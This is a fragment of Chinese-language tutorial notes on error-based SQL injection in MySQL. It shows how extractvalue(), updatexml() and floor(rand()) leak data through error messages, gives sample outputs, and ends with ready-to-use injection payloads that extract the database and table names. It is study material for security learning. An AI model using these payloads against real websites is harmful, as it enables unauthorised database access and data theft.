|
|
- 2、extractvalue(arg1,arg2) :從目標XML中返回包含所查詢值的字符串,arg1爲是String格式,爲XML文檔對象的名稱。arg2爲Xpath格式的字符串。
|
- 語句:select extractvalue(1,concat(0x7e,(select user()),0x7e))
- 返回結果:XPATH syntax error: '~root@localhost~
|
- 3、updatexml(arg1,arg2,arg3):改變文檔中符合條件的節點的值,arg1位xml文檔對象的名稱,arg2爲xpath格式的字符串,arg3,String格式,替換查找到的符合條件的數據。
|
- 語句:select updatexml(1,concat(0x7e,(select user()),0x7e),1)
- 返回結果:XPATH syntax error: '~root@localhost~
|
- 4、floor(arg1):函數只返回arg1整數部分,小數部分捨棄。
|
- 語句:select 1,(select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a),3
- 返回結果:Duplicate entry 'root@localhost1' for key 'group_key’
|
- 5、Extractvalue() updatexml()
|
|
|
- 1' and extractvalue(1,concat(0x7e,(select database()),0x7e))#
|
|
- 1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))#
|